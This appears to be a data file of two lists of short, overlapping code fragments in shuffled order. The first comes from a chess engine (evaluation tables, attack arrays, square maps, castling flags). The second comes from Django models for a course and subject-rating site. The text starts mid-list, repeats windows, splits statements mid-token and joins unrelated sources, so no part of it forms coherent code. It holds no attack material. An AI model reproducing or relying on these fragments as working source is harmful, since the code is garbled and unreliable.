-1.0, 0.5, 0.5, 1.0, 1.0, 0.5,", ": 'p', 2 : 'n', 3 : 'b', 4 : 'r', 5 :", "0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0,", "'b': 2, 'r': 3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL':", "0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0,", "[ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0,", "0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0,", "-4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0,", "'p', 2 : 'n', 3 : 'b', 4 : 'r', 5 : 'q',", "0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0,", "-2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] ]", "'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2':", "'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'],", "0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0,", "0, 0, 0, 0, 0,20 ] RAYS = [ 17, 0, 0, 0,", "-1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0,", "] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0,", "0, 16, 0, 0, 0, 0, 0, 0, 15, 0, 0, 17, 0,", "0, 0, 15, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0,", "PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b':", "56, 53, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6", "0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0,", "112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118,", "'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag':", "-0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0," ]
[ "models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed =", "{self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category',", "class Meta: managed = False db_table = 'subject' def __str__(self): return f'Subject {self.id}", "__str__(self): return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80,", "django.db import models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True,", "= models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty =", "null=True) class Meta: managed = False db_table = 'course' def __str__(self): return f'Course", "Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student =", "| Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self',", "__str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category =", "db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson =", "lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table", "class Meta: managed = False db_table = 'course' def __str__(self): return f'Course {self.id}", "= 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject", "blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description", "db_column='lesson', blank=True, null=True) class Meta: managed = False db_table = 'enrollment' def __str__(self):", "{self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion", "False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} |", "blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True,", "f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True)", "= False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username} | Subject: {self.subject.name}'", "= models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table =", "null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table =", "Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True)", "return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject',", "class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion =", "= models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed", "'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True)", "db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True)", "= models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True,", "status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class", "models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table = 'enrollment'", "return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category,", "'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject =", "{self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent',", "models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating' def __str__(self): return", "{self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student')", "= models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True,", "models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson", "null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta:", "class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True,", "| Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student", "models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200,", "{self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING,", "= models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating' def __str__(self):", "| Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student',", "'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name =", "faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty' def", "null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description =", "db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80,", "= models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty' def __str__(self):", "{self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent =", "= models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty',", "django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True,", "= models.IntegerField(blank=True, null=True) class Meta: managed = False db_table = 'course' def __str__(self):", "models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100,", "blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table", "{self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True)", "import MaxValueValidator from django.db import models from django.utils import timezone class Faculty(models.Model): name", "db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table", "| Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject')", "= models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed =", "null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category", "category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table = 'course' def", "def __str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category", "django.core.validators import MaxValueValidator from django.db import models from django.utils import timezone class Faculty(models.Model):", "null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence", "Meta: managed = False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class", "null=True) class Meta: managed = False db_table = 'subject_rating' def __str__(self): return f'Subject:", "= models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING,", "null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table = 'course'", "Meta: managed = False db_table = 'course' def __str__(self): return f'Course {self.id} |", "return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject =", "managed = False db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name:", "null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating'", "def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model):", "pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed", "rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class", "models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson',", "'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name", "models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table = 'subject' def __str__(self):", "student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson',", "import models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True)", "from django.core.validators import MaxValueValidator from django.core.validators import MaxValueValidator from django.db import models from", "category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic", "course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category =", "django.core.validators import MaxValueValidator from django.core.validators import MaxValueValidator from django.db import models from django.utils", "managed = False db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model):", "name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING,", "f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True,", "models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty' def __str__(self): return", "models.IntegerField(blank=True, null=True) class Meta: managed = False db_table = 'course' def __str__(self): return", "db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True,", "= 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True,", "blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table =", "= models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic =", "managed = False db_table = 'course' def __str__(self): return f'Course {self.id} | Name:", "# id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True)", "name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb", "models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True)", "class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status", "class Meta: managed = False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username}", "null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True)", "models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed", "Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student", "= models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True)", "blank=True, null=True) class Meta: managed = False db_table = 'enrollment' def __str__(self): return", "blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class", "null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False", "__str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject", "models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) #", "= 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True)", "models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True)", "= 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}'", "null=True) class Meta: managed = False db_table = 'enrollment' def __str__(self): return f'Student", "from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion =", "def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name =", "Meta: managed = False db_table = 'subject' def __str__(self): return f'Subject {self.id} |", "Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING,", "models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True,", "False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id", "blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True)", "models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True,", "{self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student =", "f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class Enrollment(models.Model): subject = models.ForeignKey('Subject',", "null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed =", "Enrollment(models.Model): subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status =", "f'Category {self.name}' class Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING,", "SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student',", "MaxValueValidator from django.db import models from django.utils import timezone class Faculty(models.Model): name =", "return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True)", "= models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta:", "null=True) class Meta: managed = False db_table = 'category' def __str__(self): return f'Category", "False db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name =", "Subject(models.Model): name = models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True)", "student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence =", "parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table", "managed = False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student", "import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True)", "models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table = 'category' def", "models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False", "class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING,", "'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating: {self.rating}' class", "db_table = 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model):", "models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True)", "= models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True)", "False db_table = 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class", "timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table = 'subject_rating' def", "db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): # id =", "Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed", "= 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name", "= False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model): #", "__str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True,", "name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class", "= models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True,", "import MaxValueValidator from django.core.validators import MaxValueValidator from django.db import models from django.utils import", "class Meta: managed = False db_table = 'category' def __str__(self): return f'Category {self.name}'", "null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb = models.CharField(max_length=100, blank=True, null=True)", "description = models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table = 'subject'", "{self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student',", "models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating =", "= models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table =", "null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table = 'faculty'", "db_column='parent', blank=True, null=True) class Meta: managed = False db_table = 'category' def __str__(self):", "null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed =", "# lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False", "managed = False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username} | Subject:", "thumb = models.CharField(max_length=100, blank=True, null=True) pic = models.CharField(max_length=200, blank=True, null=True) description = models.CharField(max_length=1000,", "models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed", "blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed =", "def __str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject,", "MaxValueValidator from django.core.validators import MaxValueValidator from django.db import models from django.utils import timezone", "= models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta:", "Meta: managed = False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} |", "= models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta:", "return f'Faculty {self.name}' class Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True,", "commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False", "db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model):", "= models.CharField(max_length=1000, blank=True, null=True) class Meta: managed = False db_table = 'subject' def", "subject = models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True,", "null=True) class Meta: managed = False db_table = 'faculty' def __str__(self): return f'Faculty", "from django.core.validators import MaxValueValidator from django.db import models from django.utils import timezone class", "models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed", "class Meta: managed = False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name}", "False db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}' class", "Meta: managed = False db_table = 'enrollment' def __str__(self): return f'Student {self.student.account.username} |", "def __str__(self): return f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80,", "Meta: managed = False db_table = 'category' def __str__(self): return f'Category {self.name}' class", "blank=True, null=True) class Meta: managed = False db_table = 'category' def __str__(self): return", "class Meta: managed = False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}'", "models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion", "blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True)", "name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed =", "= False db_table = 'category' def __str__(self): return f'Category {self.name}' class Subject(models.Model): name", "= False db_table = 'subject' def __str__(self): return f'Subject {self.id} | Name: {self.name}'", "managed = False db_table = 'faculty' def __str__(self): return f'Faculty {self.name}' class Course(models.Model):", "f'Course {self.id} | Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent", "models.DO_NOTHING, db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp", "models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True,", "= models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table", "db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username} | Rating:", "blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False db_table =", "models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True, null=True) class Meta: managed = False db_table = 'category'", "models.DO_NOTHING, db_column='lesson', blank=True, null=True) class Meta: managed = False db_table = 'enrollment' def", "= False db_table = 'subject_rating' def __str__(self): return f'Subject: {self.subject.name} | Student {self.student.account.username}", "db_column='student') status = models.IntegerField(blank=True, null=True) # lesson = models.ForeignKey('Lesson', models.DO_NOTHING, db_column='lesson', blank=True, null=True)", "from django.db import models from django.utils import timezone class Faculty(models.Model): name = models.CharField(max_length=80,", "models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True, null=True) class Meta: managed = False db_table =", "class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta:", "__str__(self): return f'Subject {self.id} | Name: {self.name}' class SubjectRating(models.Model): subject = models.ForeignKey(Subject, models.DO_NOTHING,", "models.ForeignKey(Subject, models.DO_NOTHING, db_column='subject', blank=True, null=True) student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student', blank=True, null=True) rating", "timezone class Faculty(models.Model): name = models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class", "class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING, db_column='parent', blank=True,", "blank=True, null=True) class Meta: managed = False db_table = 'subject' def __str__(self): return", "null=True) faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class", "faculty = models.ForeignKey('Faculty', models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta:", "= models.CharField(max_length=80, blank=True, null=True) category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category', blank=True, null=True) thumb =", "subject = models.ForeignKey('Subject', models.DO_NOTHING, db_column='subject') student = models.ForeignKey('users.Student', models.DO_NOTHING, db_column='student') status = models.IntegerField(blank=True,", "models.DO_NOTHING, db_column='faculty', blank=True, null=True) category = models.IntegerField(blank=True, null=True) class Meta: managed = False", "db_column='student', blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp =", "= models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False", "= False db_table = 'course' def __str__(self): return f'Course {self.id} | Name: {self.name}'", "Name: {self.name}' class Category(models.Model): name = models.CharField(max_length=80, blank=True, null=True) parent = models.ForeignKey('self', models.DO_NOTHING,", "Course(models.Model): # id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True,", "blank=True, null=True) rating = models.IntegerField(blank=True, null=True) commence = models.TextField(blank=True, null=True) timestamp = models.DateTimeField(blank=True,", "models.CharField(max_length=80, blank=True, null=True) faculty_describtion = models.TextField(blank=True, null=True) class Meta: managed = False db_table", "id = models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty", "models.IntegerField(primary_key=True) name = models.CharField(max_length=80, blank=True, null=True) course_describtion = models.TextField(blank=True, null=True) faculty = models.ForeignKey('Faculty',", "null=True) class Meta: managed = False db_table = 'subject' def __str__(self): return f'Subject" ]
